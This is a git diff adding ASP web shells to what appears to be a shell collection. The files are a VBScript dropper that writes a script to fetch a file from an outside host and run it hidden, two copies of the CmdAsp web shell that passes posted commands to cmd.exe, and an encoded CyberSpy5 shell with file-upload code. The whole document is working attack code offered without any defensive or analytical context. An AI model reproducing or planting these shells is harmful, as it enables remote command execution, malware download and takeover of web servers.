diff --git a/xakep-shells/ASP/Ajan.asp.txt b/xakep-shells/ASP/Ajan.asp.txt
new file mode 100644
index 0000000..e4ce66e
--- /dev/null
+++ b/xakep-shells/ASP/Ajan.asp.txt
@@ -0,0 +1,30 @@
+<SCRIPT LANGUAGE="VBScript">
+<%
+Set entrika = CreateObject("Scripting.FileSystemObject")
+Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
+entrika.write "Dim BinaryData" & vbcrlf
+entrika.write "Dim xml" & vbcrlf
+entrika.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
+entrika.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
+entrika.write "xml.Send" & vbcrlf
+entrika.write "BinaryData = xml.ResponsebOdy" & vbcrlf
+entrika.write "Const adTypeBinary = 1" & vbcrlf
+entrika.write "Const adSaveCreateOverWrite = 2" & vbcrlf
+entrika.write "Dim BinaryStream" & vbcrlf
+entrika.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
+entrika.write "BinaryStream.Type = adTypeBinary" & vbcrlf
+entrika.write "BinaryStream.Open" & vbcrlf
+entrika.write "BinaryStream.Write BinaryData" & vbcrlf
+entrika.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
+entrika.write "Dim WshShell"  & vbcrlf
+entrika.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
+entrika.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
+entrika.close
+Set entrika = Nothing
+Set entrika = Nothing
+
+Dim WshShell
+Set WshShell = CreateObject("WScript.Shell")
+WshShell.Run "c:\net.vbs", 0, false
+%>
+ </SCRIPT>
\ No newline at end of file
diff --git a/xakep-shells/ASP/CMD.asp.txt b/xakep-shells/ASP/CMD.asp.txt
new file mode 100644
index 0000000..479db5d
--- /dev/null
+++ b/xakep-shells/ASP/CMD.asp.txt
@@ -0,0 +1,53 @@
+<%@ Language=VBScript %>
+<%
+  ' --------------------o0o--------------------
+  ' File: CmdAsp.asp
+  ' Author: Maceo <maceo @ dogmile.com>
+  ' Release: 2000-12-01
+  ' OS: Windows 2000, 4.0 NT
+  ' -------------------------------------------
+
+  Dim oScript
+  Dim oScriptNet
+  Dim oFileSys, oFile
+  Dim szCMD, szTempFile
+
+  On Error Resume Next
+
+  ' -- create the COM objects that we will be using -- '
+  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+  ' -- check for a command that we have posted -- '
+  szCMD = Request.Form(".CMD")
+  If (szCMD <> "") Then
+
+    ' -- Use a poor man's pipe ... a temp file -- '
+    szTempFile = "C:\" & oFileSys.GetTempName( )
+    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+  End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    ' -- Read the output from our command and remove the temp file -- '
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
diff --git a/xakep-shells/ASP/CmdAsp.asp.txt b/xakep-shells/ASP/CmdAsp.asp.txt
new file mode 100644
index 0000000..e524745
--- /dev/null
+++ b/xakep-shells/ASP/CmdAsp.asp.txt
@@ -0,0 +1,55 @@
+<++ CmdAsp.asp ++>
+<%@ Language=VBScript %>
+<%
+' --------------------o0o--------------------
+' File: CmdAsp.asp
+' Author: Maceo <maceo @ dogmile.com>
+' Release: 2000-12-01
+' OS: Windows 2000, 4.0 NT
+' -------------------------------------------
+
+Dim oScript
+Dim oScriptNet
+Dim oFileSys, oFile
+Dim szCMD, szTempFile
+
+On Error Resume Next
+
+' -- create the COM objects that we will be using -- '
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+' -- check for a command that we have posted -- '
+szCMD = Request.Form(".CMD")
+If (szCMD <> "") Then
+
+' -- Use a poor man's pipe ... a temp file -- '
+szTempFile = "C:\" & oFileSys.GetTempName( )
+Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
+
+End If
+
+%>
+<HTML>
+<BODY>
+<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
+<input type=text name=".CMD" size=45 value="<%= szCMD %>">
+<input type=submit value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+If (IsObject(oFile)) Then
+' -- Read the output from our command and remove the temp file -- '
+On Error Resume Next
+Response.Write Server.HTMLEncode(oFile.ReadAll)
+oFile.Close
+Call oFileSys.DeleteFile(szTempFile, True)
+End If
+%>
+</BODY>
+</HTML>
+<-- CmdAsp.asp -->
diff --git a/xakep-shells/ASP/CyberSpy5.Asp.txt b/xakep-shells/ASP/CyberSpy5.Asp.txt
new file mode 100644
index 0000000..bcf5138
--- /dev/null
+++ b/xakep-shells/ASP/CyberSpy5.Asp.txt
@@ -0,0 +1,2 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%#@~^FkQBAA==@#@&rU,2MDWMP"n/!:nPg+aO@#@&?.\DRU^.kaY:kh+6;DP~',{ Z!@#@&@#@&frh,1n/	nw?6@#@&"+/aW	d+c.kD+~E@!/YHs+@*PA}9ePPPUZ]rJJ~b]O~)?AO/6drIl~[&$&~f~i~UZ"rSdAz]OzI]rqO/6drI=~a2&swffi,8,@!&/Oz^+@*J@#@&I/2G	/+ 	MkO+,E@!4G9X,4o1W^GD{!T!Z!T~D+6DxB[!!woT!EP^kU3xv[!TswT!EPCsbx3xv[!TswTZB~7Vbx3{B[T!wsT!EPOGa:lMLk	'!@*E@#@&@#@&`w[lOn;W[+,xPrtOOa)z&ASh ZH8DRqlMDkKDc6DTz/X(+.jaX*c)/agu-kE@#@&@#@&BRORR ORO RO O)UKxkh~`wsWm[;VCk/,?YmDD~ZKNnO ORR OO RO OO RRO O ORORR @#@&Z^C/kPor^+j2sKl[+M@#@&dK!4^km,PwrV/@#@&in.r7lY~sKD:Asn:mxhD#@#@&7hDr\mO+,?;8,ZVCdk{(xbOblsby`#@#@&i7?Y~sbVnd,'PUnD7+Dc/.+mYr8Ln^D`E?1.kaYrUTRfr^DkGxm.HJb@#@&id?Y,oWM:3V:CUhD.,xPU+D7n.R;DlO+68N+^YvE?1Dr2DkxL Gk^YbG	l.HJ*@#@&i2	[PUE8@#@&dK.b\lDnPUE4,/slk/|KnDhr	lO+vb@#@&d7rwPqd6(LnmDcwks/*PK4+	@#@&id7sbVndcI+sG\bV^cb@#@&didj+O~wks+k~',1GO4kxL@#@&d72	[,ko@#@&idkwP&dr(LnmD`oGM:2^n:mxnM#bP:tx@#@&77isGDs3V:CUhD. ]:G\)^Vc*@#@&ddi?OPwW.:AVnhmxnM#P{P1KO4k	o@#@&7d3U9Prs@#@&dAx[~UE4@#@&in;4^r1PKMWa+DDX,!+DPoWM:cd&xNa#@#@&dioGDsP{PEJ@#@&idrs,oWM:3s:lUKM. 2XrkYdvS;l/`k(x9+a#*PP4xPwGDsP',oGDs2^+hlUKM. qDn:vS/Ck+`d(	Nn6*b@#@&7Ax9PnMWanDDX@#@&in;8^km,9+6lE^O~?!4,j2VGC9`b@#@&7dGkh~(kfCOm~~/&UaEOgls+@#@&di9ksPUnK/$nTkxB~xhW/AU[~,xhWd~~-GlOl~GE	NdS,xfCOmAGE	[hWd@#@&idfb:,UnK/ok^+S~	nWk$W!xN@#@&7d(kGlOl~x,In;!n/DR$r	lDz]l[`"n$EnkYcKWDl^$XD+d#@#@&77	nWk$+Tkx,x~F@#@&idUnGdAx[P{~q	/O.~`xKGkAnobUBP8bfmYlBP;$XD+jYMkULvZtMcF2##*@#@&dikwPcxKGk2UN UnK/$nTkxb~@!'~!,P4+U,2XkY,?!8@#@&d7\GlOC~WE	[/,'Ptr[Av4bfCYCS,xKWk$+TkUS,xnGdAx[O	KK/$obx#@#@&i7xGlOl~W;U9nWk~',qxkO.AvFBP8k9CDlSP79lDl$G!xNdb@#@&7dGG,jUDk^PxGlDCAKEUNhWd~{Pq	dYMA`(r9lDlBP-fCOmAGE	[/,[~/~XYnjDDrxTcrORr#*@#@&idiUnK/~',qUdDDAvUfmYl~G;x9nK/SP8rGlOlB~Z~XOnUYDrUT`EZKUD+UDOGk/aWkrYbWUJ*#@#@&idd	KWkP',(U/DD~`UnGdBP8kGCYm~~/~XYnjDDrxTcrxCs+{J#*@#@&7dixKWkAnLbxP{~xhW/,Q~v@#@&id7xKGk2UN,xP&xdOMA`UKK/$+Tr	~~(kGlYm~,/AHYn?DDrUT`Z4.`2c#*b@#@&idi/(x2;D1C:~',Z	r9+?O.bxL`tr9Ac(kGlYm~,UnK/$+TkUS,xnKd2	NO	KG/~+TkU#b@#@&d7d	KWksrsP'~(	/OD~c	fCDl~WE	NhG/BP8kGlOCBPZ~zY?YMrUovJ6ks+UCs+xJ*b@#@&d77	nWd$KEUN,x,qUkYMA`	nKd2	NSP(k9CDl~,-fmYl~G;x9/*@#@&d77bs~xhG/wksn,@!@*~T,bUN,~	nGksbV+,@!,UnK/$W!x[~:t+	@#@&iddi9r:,W`wsWC[wks+B~/wksngl:n@#@&d7dijY~KjaVWmNwrVPxPg+A~`wVKCNNsbsn@#@&did7xKGkAnobUP{PUKK/srsPQP8T@#@&7idixnK/AUN,'~P&xdOMA`	KWkA+TrU~,4bfCYCS,Z$XDn?DDrUT`Z4.v&*#*b@#@&7idi/sbVHls+~',Z	r9+?D.k	o`tr[Av4bfCYCS,xKWk$+TkUS,xnGdAx[O	KK/$obx#*@#@&7didGjaVGC9sk^nRwkVHC:P{P]kL4D`dsbs+glhnBPSnUv/ok^nglh# qxUYM]+7`dsbVnHm:+B~J'J#*@#@&didixKWd~{P(xkOD~`UKK/2U[BP8kGCDlS,Z~XY?D.k	ocJ;WUOxY PXa+)rbb@#@&did7xKGkAnobUP{PUKK/PQ~8c@#@&i7idUhWk2x9P{~q	/OD~`UKK/ALk	~P(r9lDlBP/AzO?ODbUovZ4.vF&bb*@#@&di7iWiaVKlNwk^nR;WUYxOPHw+,xP;k9njYMk	ocHr[~`8kGCYm~~UhW/$nTkU~,UhWdAx9OxhWk$+TkU#*@#@&7idd	KWkA+TrUP{P	nG/3U9_*@#@&7didUKK/2U[,'~q	dDD$vxhW/~+TrxBP8kGlOCBP\GCYmAW!U[/*P P+@#@&7id7W`2VKl[obV+ obVnfmOmPx,HbNAv4b9lDlSP	nGd~+obU~,xnKd3x9O	nG/$nTkU#@#@&did7rwPWi2^WCNwr^+ wk^+?by~@*,!~K4+U~wkVdRzNN,J/lk+v/(x2;D1C:b~,Wi2^Wl[obVn@#@&7id3^/@#@&idi7xhWdP{P(UkYD~cxhW/B~8kGlDlSP/$HYn?D.k	oc/4D`qf*#b@#@&7id7	nK/AobUP{PUnK/~Q,c@#@&7didxhGd2	N,'~qUdDD$`	KWkAnLbx~~8bfCYmS,\9mYmAW!x9d#,O~ @#@&77idkw~1KYPwG.:AV:CxK.jR36bdYk`J/m/+cd&x2EDHm:n*#,Ktx,oWM:3V:CUhD.c)N9PS;Cd+v/&x2EOHm:n#B~Zqk[nUYDrUT`\k9$v4rGlDl~,xhG/~+Lk	~~UhW/AUN xnKd$+Tk	#b@#@&7id3x9~kw@#@&7idx9CDl$W!U9nGkP{Pq	/D.Avx9lDl$G!xNhG/,_PdnUAv\GlOl$G!x[/*SP(k9CDl~~-GlOl~G!x[k#@#@&diSKGw@#@&72	N~j!4@#@&7nMk\mOnPwE	mOkGU,Z$XDn?DDrUT`/jOMkUo*@#@&d7GksPAHYrx9+a@#@&d7oKDP~zYkx9naP{P8POW~Jxc/UODbxLb@#@&d7~,P/AHO?OMk	oP{P;$XD+jYMkUL,[P;4D~`bk^$`tk9`d?O.bxL~~zYkU[6~qb*#@#@&i7g+aD@#@&d2	N,oE	mOkKx@#@&inDb-lD+Pw;UmDkKx~Z	r9+jYMrxT`8dUYDrUT#@#@&i7Gkh,AHY+bx9n6@#@&7d;r[?YMrxTP'rE@#@&idwW.P$zD+rx9n6,'~q,YW~Jx$`(dUY.bxT#@#@&di~P,Z	k9+jOMkxT~',Zb[n?DDbxLP'~;t.`zdm~`\r9A`8dUY.k	LBAzD+bxN6Bq#*#~@#@&d7H6Y@#@&dAxN,o;x1YbWU@#@&3	N~Z^C/k@#@&/^l/d~`wsWm[NobV@#@&in!8Vbm~ZKxOn	YKH2+@#@&dh;8Vbm,srVnHm:n@#@&7n!4sr1PsrsfCYm@#@&dK!4^km,nMGwDOX,MnO,sk^n?by+vb@#@&idwks+jr.+~',J+	AcobV+9CDlb@#@&7Ax[,nMWwDDz@#@&dKE(Vr^,?E(~?m\+:G9kk3v/KlO4*@#@&di9ksPGoU~PGobVn@#@&7ifrsP~XYk	[+X@#@&diko~knlD4P{PJr~6D,sbVn1ChPxPrEP:tnU,26rO,?;4@#@&idrwPtkNv/hCY4~~SxcdhlY4b#,@!@*,EwJ,K4+UPdKmY4P{~/hlO4,[PEwr@#@&dijY~KsUP',?.\D ZM+COr4NnmD`JU^.kaYbxLRor^+jXkO+sr8%mYEb@#@&7dbo,1GDPKs?csKsND36b/Odv/nmOt*PK4nUPA6bY~?;8@#@&7dUnY,Wor^+Px~KsjR;.lOK6Ywk^n`knCY4P'~wkVHls+~,P.E#@#@&7doGMP$XDnk	Nna,'Pq~DW~SU~`obVflDl*@#@&id~P,PGobV+c	DbY+,/4Dvbkm$`\r9Acsbs+GlOCBAXOnbx[+XS8#b*@#@&ddg+XO@#@&d7WwksncZVKd+@#@&dAU[PUE(@#@&dK;(Vrm,jE(PjC7+KG9mYC4md`$HI0PKsbnV9#@#@&idro,S+	$`wkV9CYm#,'~!~P4+UPAakDPj;(@#@&77bs~qk6(Ln1YvWsb+^[#,K4+	@#@&7idWwr+^NRz22+	N;t;xV~wks+GCYm@#@&7i2x[~bs@#@&i3	N~UE(@#@&Ax9~Z^ld/@#@&@#@&wEx1OkKxPGn/DHwD?ODrUT`dYM/DHwOjDDkUL*@#@&dGrsPdDD"bBPm.C6/tmDjnD~PbSPbxYnnz~,k	Y60WjYSPkOD"lAFX~~dDDu+X/MX2GlDl@#@&d,~P,/OD"lAFXP{~IbotDcdYMZMX2YjOMkUoB~SxcdDDZ.zaYjYMr	ob,O,qxUYMc/DD/DHwOjDDk	L~,Jurbb@#@&d,P~PrUDrW0UnY,'~]botOckY.ImAn+zBPd+xv/D.ImhF+H#~R,qxUODv/YM]Chn+H~EuEb*@#@&d,~P,kUOn+X~x,Cn6;G	\cd+6Y`kYM]lS|nXBP(UUYDvdYMIlSFnXBPruE#~R,Fb#,RP_+a/Kx\cr	Y606jYb@#@&iPP,PkOD_+aZMX29mYl,xPd+0DcdYMZMX2YjOMkUoB~SxcdDDZ.zaYjYMr	ob,O,`SxvdYMIChn+zb,_P8b#@#@&d,~~PmD_+aZ4CM?nY,xPUwsrD`/O._+aZMzafCDlBPC6vrxD|nX*#@#@&idPwGD,k'Z~OW,j~W;x[cmDu+X/tmDjnD#@#@&7iP~P,~,/OMIzP{PkOD"b	PLP/4M`CaZKx\vC.C6;tCDjnD`r#*&k	YFnH#@#@&7iPH+XO@#@&7,P,PfZMzwD?ODbxL~{PZUODv/YM])*@#@&2UN~o!x^YbGx@#@&@#@&@#@&s;U1YrW	~_+a;W	\`4+X#lM#@#@&ifrh,C+X#+Mk~,un6G+Tkd3nUBPhE^OkaVz~,PP~~,P~P@#@&,P~,P,PP,kw~t6#lMP@!@*,JJ,PCA1@#@&~~P,P,P~P~~,P~ta.mD~x,jZ)jA`4+X#mDb@#@&,PP,P,~P,P~P,P4nX.lM~',?YM]n\Dk+ctnajl.#@#@&P,P~~,PP~~,P~PG(tP4X`*@#@&,P,~P,P~P,P~~,I2G(H,t6vJ31vt6#l.b*@#@&P,~P,P~~,PP~~,Cn6jnMk~{PZ@#@&,P,~P,P~P,P~~,C+X9+Tk/0nUP{PZ@#@&P~~,P~P,~P,P~~wrI~u6#+Mr,'~8P:rPd2gct6#lM#@#@&,PP,~P,PP,~~P,P,P~Pro,:;VDrw^X~x,JJ~P_2HPs;^YraVHP',F@#@&P,P~P,P~~,PP,~P,PP,4a`_+X.nDrb,'~:b[`4+a#mD~unX.nDbS8#@#@&P,PP,P,~P,P~P,P~~,PCafokkVnx,',`u+a!Kx[+MctX`unX.+.r*#~e,h!VObw^X#,_,u+Xfnob/Vn	@#@&,~P,PP,~~P,P,P~P~~,:;VDrw^X~x,`:;sDk2VH~CPq+#@#@&P,P,~P,P~P,P~~g2(:@#@&,PP,~~P,P,P~P~46#lM~',CnaG+ord0+U@#@&~,P~,P,PP,P,~P_+aZKx-~{Pta.mD@#@&~~P,P,P~P3HGPrs@#@&2	N~o!xmOrKx@#@&12MY4D:^P',J@!WW	Y~0mmnxElDbCVEP/b"n'EFE@*]+CsbYn)c@!z6WUO@*J@#@&o!x^YbG	Pu6VWx9+Mc|mYnoKDru6#@#@&P,PP,~~P,kwPFlOnTW.k_n6,'~EzJPP4x@#@&,~,P~,P,PP,P,~|mYnoKDru6P{~FZ@#@&,~~P,P,P~2sdkoPnCYoG.bC+a~{PEAr~:tn	@#@&PP,P,~P,P~P,P~FmY+TGDbC+X~xP8F@#@&~P~~,P~P,3Vk+ro,|lOnTW.k_nXPx,J;JP:tU@#@&P~P,P~~,PP,~P,|lDnLWMk_+aPx~8 @#@&,~P,P~~,P2sdkoPnCD+LKDbC+XP{~JGJ~K4+U@#@&PP,~P,PP,~~P,PnlO+LGMku+X~',Ff@#@&PP~~,P~P,3^/nbs,|lD+TGDbCn6,'~EAJP:4+	@#@&,~~P,P,P~P~~,PFlDnoKDru6Px~8c@#@&,~,P~,P,P2^/rs,|CYoG.bC+X~',Jsr~Ptx@#@&~P~~,P~P,~P,P~FmY+LGMku+X~{Pql@#@&PP,P,~P,P3x9Pro@#@&P,~P,PP,~u+XMKx[+.~{PFlDnoKDru6@#@&3	N~s!U1YrKx@#@&@#@&s!UmDkGx,r8%MWkO+M`W(%2lDt*@#@&d68N+!WkO+MPx~tkNcG(L2lD4BqUkYMI+7`K8LalOtBJwE*_FBJ+	`W(%2lDt*#@#@&3U9PoE	^YbWU@#@&sEU^DkGx,6(LnVWkY+MwmOtvW8LalO4*@#@&i64N+MKdO+MwmY4Px~d+WYvG4NwCO4~qUdDD]+7cK4%alDt~r-rb#@#@&3x9Po;	mYbGx@#@&s!U^YbW	PFWUOMWssKU3kkzG	`lS8*@#@&dbo,ZjDDvHk9`mSFBFb#,@!@*~;?YMcHbN`(Sq~8#*PPtnU@#@&7dUCX6l~x,Hk[c"+5EdDRjD7+DjlMrl(Vn/vJj/"qn:m1zH2rbSq	/DD]+-c"+5EdYc?n.7+D#CMkC4^nk`EUZ"qn:{g)HAJb~rzEb3F~dnxvI+$;n/DRU+.\n.jl.km8V/cEUZI(K:{Hbt3r#b*PLPJQl1OkKxx+MDG.r@#@&i7I/wKUd+cINrDn^D`jlHWl*@#@&7AxN~rw@#@&2	[,s;	mDkW	@#@&@#@&@#@&/hl.Cs+YMnP{PJ"GGKr@#@&BRORR ORO RO ORR OORR ORO R OR O OO O@#@&@#@&koP:DrhvI+$;+kYR5;nDH?DDrxLcrZ	nm.ls+O.J#b~{PEJ,P4+U@#@&iddj+MrnmDC:Y.n,'PUnD7+Dc\CwhlDtcIn5!+dYcj+M\n.jlDrC(Vn/vEUZ]&n:{1zHAE#*@#@&did2GkP',(xkYDv#nDbnmDC:nOM+SJ'E#@#@&77iwWd+,'~F@#@&id7qtbV+,wKd ,@!@*PZ@#@&7iddboP&x/D.cwK/,_~FS#Drnm.ls+O.~JwE*P@!@*,T,K4x@#@&didi7wK/~',qUdDD`aG/,_P8S#+Mkhl.lhnDDn~rwJ*@#@&7idd3sk+@#@&i7id7aWk P{PZ@#@&id7dAx[~bs@#@&7di+	[@#@&idiZ	nC.m:nYMnP{PJn6Y`#nMkKlMCs+OM+BwWk#@#@&di2s/@#@&7idZqKlMl:O.+,',PODrhvIn;!n/DR};DXjOMkUovE;KmDm:+DDE#*P'Pr-E@#@&ddAUN,ks@#@&7d@#@&EORORR ORO RO ORR OORR ORO R OR O OO di@#@&@#@&vO ORR OO R5Y3bsnD,|KxODGs,?OlMOO ORR OORR ORO R OR@#@&E5l.:mRO OR@#@&frh,fWkzl}VEkO;DslBPP+aO@#@&j+D~fK/zC}VEdO!Dhl{/M+CD+}4LmD~`r?^DbwOr	oRwrV?XkOn:}4N+^YEb@#@&j+D~K6O~{PfGdHl6V!dDE.slcZDlDnK6OsbVn~vZhCDm:+D.n[r5YVkFG	Y.W^P+sw OXYJb@#@&@#@&KaDR	MkD+Sbx~`rMnçk1k~6^lDmVP}VEþD;.E^:!þP8k.~GWdXm[ýDcR E*@#@&PnXY MrD+JbxP`rZH8+M?2X,*Eb@#@&KaYcZVKdn@#@&@#@&koP3.MRHEs8+MP@!@*,!PP4x@#@&IC.:CI+D3kkk,xPrûJ@#@&AVdn@#@&5m":m5+DVr/bP{PEüJ@#@&Ax[Pbo@#@&@#@&v}3EhC ORO @#@&frsPGW/Hlz^:m~~K6OobV+:n/D@#@&UnOPGWkXCb^hm'j+M-+MR/.lYn6(LnmD~vJj1DbwYbxT sbVn?H/Onsr4NnmDJ#@#@&j+DP:+aYor^+P+kO'GWdzmbmhCcr2+	P6Owk^+PvZqKlMlh+DDn'r5+DVknWxD.GV:+sw YaOr#@#@&E]+kwGUk+R	.bYnPvP6Owk^+K/D Il[b^Vb@#@&@#@&boPADDcH;:(+MP@!@*~T,K4+	@#@&}3;hm5+OVb/rP{~rûJ@#@&2^/+@#@&}VEsle+D3rdbP',EüJ@#@&2	[~kw@#@&@#@&KnaDsrVP+kY ^^W/n@#@&?nY,P6Owk^+K/Dx1KY4k	o@#@&U+Y,9WkXlz^hl{1KY4kUL@#@&@#@&Ejk^:nR OOR@#@&fr:,9K/zm?bV|KxD.W^@#@&?Y~9K/Xmjk^|W	O.W^';DnlOn}4%+1OPvJj^MkwOr	o sbs?zkY:r(L^Yr#@#@&GWdzm?k^FW	YDKs fVYnsrsPcZqKlMlhnDD+'EI+O3bFKxOMW^K+swcO6DJb@#@&@#@&rwP2M.RgE:(n.P@!@*,!~K4n	@#@&?bs:5nO0k/r~{PEûJ@#@&AVd@#@&?k^:e+D3r/bPx~rüJ@#@&3x9Pkw@#@&@#@&@#@&BRORR ORO R5myhCJ?kshPe+DVb/r,|KxYMW^~2	NRO ORR OO RO OO RRO O@#@&@#@&@#@&@#@&8D{E[	4d2pP[U8kwIPLU(/2pP@!Yl(V~hbNOt{JEqZ!]rEP(WD9n.'rJ8!EJ~^Vs/aCmbxLxrJ!EE,mnV^2mN[bxT'Jr,rE@*r@#@&/DXsnE'[srNvJR@!OC4^+,hrNO4{JE*RYJrP8GMN+.xrJTJr~4+rTtD'JrFyfJrP^+^V2C9Nk	L'rJcrE~mV^/2l^r	oxJr*Jr@*ESZ~!b@#@&4.'r'	4dai,[x(/aIPLx8/ai~@!Dl4^nPSkND4xJrFZ!YJE~(W.N.'rJqTrJP^n^Vdwm^bxL{Jr!JrP1nV^wCN9kUL{JJOEJ@*J@#@&dOX^+{/OXsnE[E@!D[PSk[O4'J*E,tnkT4D'EWJ@*[x(/aI@!JY[@*r@#@&dDXVx/DXV'hk9`rZd/ESZ~T#Lhk9`E@!kYXsn@*JS!BT*[hbNvJ?1DKsV(l.JB!ST*[:b[`rt+bL4Yr~8~q#'hbNcJk^Dr~TSZ#[hr9`Eb[DtEBcBF#@#@&DCo{J'x(/2I,[x(dwpP[	8dwpP@!YC4sn,hrND4'rJqTZ]JE~(W.N.{JE8!rJP1+^s/al^k	oxEr!Jr~mVVaC[NbxT'EJ1Er@*E@#@&vV0Ox^+0v'r@!ON,AbNO4'rcJ,tro4YxJWJ@*'	4/aI@!JYN@*E@#@&kYHVn'dOHVn[srNvJ4nbotOEBFSF*'sk[vJqkNDtrScBFb[sk[crk9Otr~cBqb[sk9`Emns^wCN9rxTJSXBF#'s0O`rlQf):br~F*[srNvJ@!zDD@*EB ~8b[skNvE@!zDN@*JS Sq*B':b[`rr[DtJSqBFb[sr9`E@!z:l4^+@*E~W~q#L:r[vJ@!D.@*r~&Bqb[sk9`E@!O.@*JS&Bq#LJrELJW.ELJE[r r[J0D`J}JBq#LSn0D`E.botDE~8#[MrLtD`rmnVsdal^k	LJBFb@#@&4DxELx8/aI,[U(/aiPLx(dwpP@!Ym4sn,hk9Ot{JJ8TT]rJ,4GD[nM'EJ8TJrP^n^V/2C1kUo{Er!ErP1+V^wm[NbxL'rJ1Er@*J@#@&/DXVxdYHVB':r[vJ@!Ym8VPAr9YtxEr*0]rE,4GMND'rJZEJ,tnkTtOxrJFyfJrPmsswmN9kUoxErcEJ,^+^Vd2mmkUL{JEcrE@*JSZ~Z#@#@&/DzVBx[$`E@!Dl4^nPSkND4xJr*R]EJ~8KD[+MxJr!EE,t+rL4YxJrqy&ErP1+V^wm[NbxL'rJ*ErPmsVkwl1rUo{JrcEJ@*EB!S!*@#@&$'5'skNcE@!Y[@*Sr9Y4@!zDN@*r~lSF*[hk9`E@!kYX^n@*r~!BTb[sk9`E?^.KVs4m.JB!ST*[:r[vJ4+bL4YEBFBF#L:b[`r/^Dr~TSZ#[srNvJb[Otr~W~q#@#@&kYzVx/DXsnE[J@!O9PAk9O4'EWJ,t+bo4O'rcE@*Lx8daiR@!&Y9@*JLE@!4M@*r@#@&;x5L:rNvEtkL4DJ~qSZ#':b[vJ	bNDtJBFBq#L:rNvJ	r9YtrSFBF#LhrNvJqk[Y4EBFSF*'V0OcrRJSq*B':b[vJ@!JY9@*JB Bq#E[hk9`E	bNY4E~8~F*'hk9`r@!&KC8^+@*JB*~8#'hbN`E@!DD@*JBfBFbL:bN`r@!D.@*r~f~8#'EbJ[rGDr[Jr'ERr[d+WYcE}JSF*'S0OcrDkL4DJSF*'MkL4YvJmV^dwmmrxTJSq*@#@&t/lk+B{'\Zm/`E@!OC(VnPSrNDtxEr*%YErP8WM[DxrJZJJ,tro4YxJrF+frJP1nV^wl9[rxT'rJ*JE~1+sVk2l1kUL{JJ*Er@*E~ZSZ#@#@&H;l/'t/lk+v[r@!O[,hk9Ot{Jcr~4+bo4YxJ*E@*[U4k2i@!zO[@*J@!O[,hrND4{J*rP4+kTtDxJWJ@*@#@&Esxr@!Ym8VPhb[Ot{JrFT!YErP8WM[+M'EE8!JE~1+sVk2mmr	o{JJlJr~mVswmN[r	o'rEcrJ@*r@#@&H;lk+xH/Ck+':b[`rZddr~FSq*[hk9cr@!dDX^+@*r~WSF*[hk9`Ej1DW^s4mDJB{SF*[sk[`E4kLtDE~y~qbL:k[cr/^DrS2~q*@#@&HZm/v'LH/lk+cE@!Yl(s+,hk9O4'rJl%YJE~(W.N.'rJTErPtnrTtO'rE8 frJ,m+^VaCN9kUo{JE*rJP1nV^/wm^rxT'rJ*JE@*r~T~Zb@#@&4.xr[x8dai~[	8kwI,[	4/ai,@!Ym4s+,hr[Dt'rEFZ!]rE~4KD9+.'EE8!EJ,^+^Vd2mmkUL{JE!rE,mn^ValN9k	L'rJ1Jr@*E@#@&HZmd+{HZmdnBLJ@!Y[PAr9Y4'r*J,tnrTtYxEWJ@*[	8kwI@!zDN@*r@!D[PSk[Y4'E*rPtro4Y'r*E@*@#@&tZC/nxtZC/':bNcE@!zY.@*r~q~ybL:r9`r@!/DX^n@*r~+~y#'hbN`rjmMWV^8CDr~Z~T#'hbNcJ4nkTtOEBF~qbL:rNvEkm.r~Z~!*[srNvJ	k9Y4EBc~8b@#@&tD{E@!Ym4^+~hr[DtxJrq!Z]EE,4W.[DxJrqZJE,mVVkwm^k	oxJr*EE,m+^swmNNbUL'rJWJE@*E@#@&khoEx[sk[cr@!YC8^+~hb[DtxrJl%]rJ,8WMNnD{JETrJP4nkTtY{EEFy&rJ~mns^wCN9rxT'EEWJJ~^Vs/aC1kUT'rJcrJ@*E~Z~T#@#@&\/m/+{\Zm/+E'E@!DN,hrNO4{J*J,4+bo4O{JcE@*Lx8/aI@!zO9@*r@#@&(D{E[@!YC4^+~AbNY4xJrF!ZYEJ,4KD[+.xrJq!rEP1+sskwl^r	oxJrTrJ~1+^VwmN9rxT'EJOJE@*r@#@&t/lk+B{'\Zm/`E@!OC(VnPSrNDtxEr*%YErP8WM[DxrJZJJ,tro4YxJrF+frJP1nV^wl9[rxT'rJ*JE~1+sVk2l1kUL{JJ*Er@*E~ZSZ#@#@&H;l/'t/lk+':bNcEUYX^nJBF~8b':bNvJ^+ssal[NbUor~XS8#[hr9`E@!JjDXs@*r~*BF*':bNcJlJSqB #E':bN`r@!&Km4^+@*JSTB!b@#@&8D{J'U(/wI~Lx8/aI,[U(/aiP@!Ym8VPAk9Y4xrJFZT]rJP(G.ND{JEFTErP^+^s/al^r	